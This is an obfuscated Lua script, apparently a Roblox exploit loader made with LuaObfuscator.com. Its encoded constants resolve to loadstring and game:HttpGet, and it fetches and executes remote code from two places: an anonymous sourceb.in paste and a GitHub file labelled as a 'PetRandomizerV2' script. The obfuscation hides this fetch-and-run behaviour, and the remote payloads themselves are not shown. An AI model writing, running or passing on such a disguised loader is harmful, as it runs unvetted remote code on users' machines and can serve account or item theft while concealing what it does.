--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((4 -(1067 -(68 + 997)))^(v32-(620 -(555 + 64)))))%((933 -(857 + 74))^(((v33-(2 -1)) -(v32-(2 -1))) + 1 + 0)) ;return v83-(v83%(1 + 0)) ;else local v84=(3 -1)^(v32-((2908 -(226 + 1044)) -(1523 + 114))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 -0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + (8 -6) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1 -0) + 2 );v18=v18 + 4 ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -90801)) + (v38 * (472 -216)) + v37 ;end local function v24() local v41=350 -(87 + 263) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(180 -(67 + 113))) then v42=v23();v43=v23();v41=1 + (0 -0) ;end if (v41==3) then if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=953 -(802 + 150) ;v44=0 -0 ;end elseif (v46==(3712 -1665)) then return ((v45==(0 + 0)) and (v47 * ((998 -(393 + 522 + 82))/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((5 -3)^(31 + 21)))) ;end if (v41==(2 -0)) then v46=v20(v43,36 -15 ,31);v47=((v20(v43,1219 -(1069 + 118) )==(2 -1)) and  -(1 -(438 -(145 + 293)))) or (1 + 0) ;v41=4 -1 ;end if (v41==(1 + 0)) then v44=792 -(368 + 423) ;v45=(v20(v43,3 -2 ,20) * ((20 -(10 + 8))^(122 -(520 -(44 + 386))))) + v42 ;v41=444 -((1902 -(998 + 488)) + 26) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=773 -(201 + 571) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67~=(1207 -(696 + 510))) then else if (v51==(1 -0)) then local v93=(function() return 0;end)();while true do if (v93==2) then v51=(function() return 1264 -(1091 + 171) ;end)();break;end if (v93==(0 + 0)) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v93=(function() return 1;end)();end if (v93==1) then v58=(function() return {};end)();for v138= #"}",v57 do local v139=(function() return 0 -0 ;end)();local v140=(function() return;end)();local v141=(function() return;end)();while true do if (v139~=0) then else local v167=(function() return 0;end)();while true do if (v167==(375 -(123 + 251))) then v139=(function() return 1;end)();break;end if (v167==0) then v140=(function() return v21();end)();v141=(function() return nil;end)();v167=(function() return 4 -3 ;end)();end end end if (1~=v139) then else if (v140== #">") then v141=(function() return v21()~=(698 -(208 + 490)) ;end)();elseif (v140==(1 + 1)) then v141=(function() return v24();end)();elseif (v140== #"19(") then v141=(function() return v25();end)();end v58[v138]=(function() return v141;end)();break;end end end v93=(function() return 2;end)();end end end break;end if (v67~=0) then else if (v51==0) then v52=(function() return function(v98,v99,v100) local v101=(function() return 0 + 0 ;end)();local v102=(function() return;end)();while true do if (0~=v101) then else v102=(function() return 0;end)();while true do if (v102~=0) then else local v169=(function() return 836 -(660 + 176) ;end)();while true do if (v169~=(0 + 0)) then else v98[v99-#"!" ]=(function() return v100();end)();return v98,v99,v100;end end end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v55=(function() return {};end)();v51=(function() return 1;end)();end if (v51==2) then v56[ #"91("]=(function() return v21();end)();for v95= #",",v23() do local v96=(function() return v21();end)();if (v20(v96, #"[", #"<")~=0) then else local v132=(function() return 0;end)();local v133=(function() return;end)();local v134=(function() return;end)();local v135=(function() return;end)();while true do if (v132==(202 -(14 + 188))) then local v161=(function() return 0;end)();while true do if ((675 -(534 + 141))~=v161) then else v133=(function() return v20(v96,2, #"asd");end)();v134=(function() return v20(v96, #"0313",3 + 3 );end)();v161=(function() return 1;end)();end if (v161==1) then v132=(function() return 1 + 0 ;end)();break;end end end if (v132==3) then if (v20(v134, #"asd", #"-19")~= #"~") then else v135[ #".com"]=(function() return v58[v135[ #".dev"]];end)();end v53[v95]=(function() return v135;end)();break;end if (v132==(2 + 0)) then if (v20(v134, #",", #"|")~= #"\\") then else v135[2]=(function() return v58[v135[2]];end)();end if (v20(v134,2,3 -1 )~= #"\\") then else v135[ #"asd"]=(function() return v58[v135[ #"xxx"]];end)();end v132=(function() return 4 -1 ;end)();end if (v132==(2 -1)) then local v163=(function() return 0;end)();while true do if (v163~=1) then else v132=(function() return 2;end)();break;end if (v163~=(0 + 0)) then else local v175=(function() return 0 + 0 ;end)();while true do if (v175==(396 -(115 + 281))) then v135=(function() return {v22(),v22(),nil,nil};end)();if (v133==0) then local v177=(function() return 0 + 0 ;end)();local v178=(function() return;end)();while true do if (v177==(0 -0)) then v178=(function() return 0;end)();while true do if (v178==0) then v135[ #"19("]=(function() return v22();end)();v135[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v133== #",") then v135[ #"-19"]=(function() return v23();end)();elseif (v133==2) then v135[ #"91("]=(function() return v23() -(2^(58 -42)) ;end)();elseif (v133~= #"gha") then else local v183=(function() return 0;end)();while true do if ((867 -(550 + 317))==v183) then v135[ #"91("]=(function() return v23() -((2 -0)^(22 -6)) ;end)();v135[ #"asd1"]=(function() return v22();end)();break;end end end v175=(function() return 2 -1 ;end)();end if (v175~=(286 -(134 + 151))) then else v163=(function() return 1666 -(970 + 695) ;end)();break;end end end end end end end end for v97= #"!",v23() do v54,v97,v28=(function() return v52(v54,v97,v28);end)();end return v56;end v67=(function() return 1;end)();end end end end local function v29(v59,v60,v61) local v62=v59[1 -0 ];local v63=v59[1992 -(582 + 1408) ];local v64=v59[10 -7 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1 -0 ;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -(1825 -(1195 + 629)) ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + (1 -0) ];else v78[v85]=v75[v85 + (242 -(187 + 54)) ];end end local v79=(v76-v70) + (781 -(162 + 618)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=(4 + 1)) then if (v81<=((6 -4) + 0)) then if ((1853<4813) and (v81<=(0 -0))) then v78[v80[2 -0 ]]=v80[1 + 0 + 2 ];elseif (v81>(1637 -(199 + 1174 + (532 -269)))) then v78[v80[1002 -(451 + 549) ]]=v80[1 + 2 ]~=0 ;else local v143=v80[2 -0 ];local v144,v145=v71(v78[v143](v13(v78,v143 + (1 -0) ,v80[1387 -(746 + (703 -(30 + 35))) ])));v73=(v145 + v143) -(1 + 0) ;local v146=0 -0 ;for v155=v143,v73 do local v156=341 -(218 + 123) ;while true do if (v156==(1581 -(1535 + 46))) then v146=v146 + 1 + 0 ;v78[v155]=v144[v146];break;end end end end elseif (v81<=(1 + 0 + (1259 -(1043 + 214)))) then do return;end elseif (v81>(564 -(306 + 254))) then v72=v80[1 + 2 ];else v78[v80[3 -(127 -(116 + 10)) ]]=v61[v80[(5557 -4087) -(899 + (1780 -(323 + 889))) ]];end elseif ((v81<=(6 + 2)) or (2821<2431)) then if ((v81<=(14 -8)) or (2874<2181)) then local v105;local v106,v107;local v108;local v109;v78[v80[605 -(268 + 335) ]]=v61[v80[293 -(60 + 230) ]];v72=v72 + (573 -(426 + 146)) ;v80=v68[v72];v109=v80[1 + 1 ];v108=v78[v80[1459 -(282 + 1174) ]];v78[v109 + (2 -1) ]=v108;v78[v109]=v108[v80[4]];v72=v72 + ((1392 -(361 + 219)) -(569 + 242)) ;v80=v68[v72];v78[v80[5 -3 ]]=v80[1 + 2 ];v72=v72 + (1025 -(706 + 24 + 294)) ;v80=v68[v72];v78[v80[2]]=v80[1254 -(721 + 530) ]~=((2009 -(542 + 196)) -(945 + (698 -372))) ;v72=v72 + (2 -1) ;v80=v68[v72];v109=v80[2 + 0 ];v106,v107=v71(v78[v109](v13(v78,v109 + 1 ,v80[(206 + 497) -(271 + (749 -(53 + 267))) ])));v73=(v107 + v109) -(1 + 0) ;v105=1500 -(1408 + 92) ;for v136=v109,v73 do local v137=1086 -(461 + 625) ;while true do if ((1288 -(993 + 295))==v137) then v105=v105 + 1 ;v78[v136]=v106[v105];break;end end end v72=v72 + 1 ;v80=v68[v72];v109=v80[1 + 0 + 1 ];v78[v109]=v78[v109](v13(v78,v109 + (1172 -(418 + 753)) ,v73));v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[1 + 1 ]]();v72=v72 + 1 ;v80=v68[v72];v78[v80[1 + 1 ]]=v61[v80[1 + 1 + 1 ]];v72=v72 + (530 -(406 + (323 -200))) ;v80=v68[v72];v78[v80[2]]=v61[v80[1772 -(1749 + 20) ]];v72=v72 + 1 + 0 ;v80=v68[v72];v109=v80[1324 -(1249 + 73) ];v108=v78[v80[2 + 1 ]];v78[v109 + 1 ]=v108;v78[v109]=v108[v80[1149 -((879 -(15 + 398)) + 679) ]];elseif ((v81==((40 -24) -9)) or (2689<=343)) then local v150=v80[(1556 -(1126 + 425)) -(985 -(18 + 964)) ];local v151=v78[v80[1903 -(106 + (6752 -4958)) ]];v78[v150 + 1 + 0 ]=v151;v78[v150]=v151[v80[2 + 2 ]];else for v157=v80[5 -3 ],v80[(5 + 2) -4 ] do v78[v157]=nil;end end elseif (v81<=((78 + 45) -(4 + 110))) then local v130=0;local v131;while true do if ((v130==(0 -0)) or (1869==2009)) then v131=v80[(1707 -(118 + 1003)) -((907 -(20 + 830)) + 527) ];v78[v131]=v78[v131](v13(v78,v131 + (1428 -(41 + 1386)) ,v73));break;end end elseif (v81>(113 -((49 -32) + 86))) then if (v78[v80[2]]==v80[3 + 1 ]) then v72=v72 + (1 -0) ;else v72=v80[8 -(4 + 1) ];end else v78[v80[168 -(122 + 44) ]]();end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5573707630756B3454302F3003553Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6F2Q626C6F782F50657452616E646F6D697A657256322F726566732F68656164732F6D61696E2F52616E646F6D697A65725632001B3Q00124Q00014Q0008000100013Q00260B3Q0002000100010004053Q0002000100122Q000100013Q00260B00010005000100010004053Q00050001001204000200023Q001206000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400122Q000500064Q0001000300054Q000900023Q00022Q000A0002000100010004053Q001A00010004053Q000500010004053Q001A00010004053Q000200012Q00033Q00017Q00",v9(),...);
